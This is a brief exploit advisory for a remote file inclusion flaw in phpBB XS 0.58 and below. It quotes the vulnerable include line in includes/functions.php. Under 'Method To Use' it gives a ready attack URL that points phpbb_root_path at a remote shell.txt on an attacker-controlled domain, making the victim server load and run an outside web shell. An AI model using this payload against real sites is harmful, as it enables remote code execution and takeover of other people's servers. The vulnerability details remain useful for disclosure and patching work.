phpBB XS versions 0.58 and below suffer from a remote file inclusion vulnerability in functions.php.
7b07fccce822c012f52d87490b22ce9ae15a05f1271d394930b5c5f8588d14cf
Author: AzzCoder
Vendor: http://www.phpbbxs.eu/
Vulnerable File: includes/functions.php
Vulnerable Code:
//The phpbb_root_path isn't initialize
include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );
Method To Use:
http://www.victim.com/[phpbb_xs]/includes/functions.php?phpbb_root_path=http://yourdomain.com/shell.txt?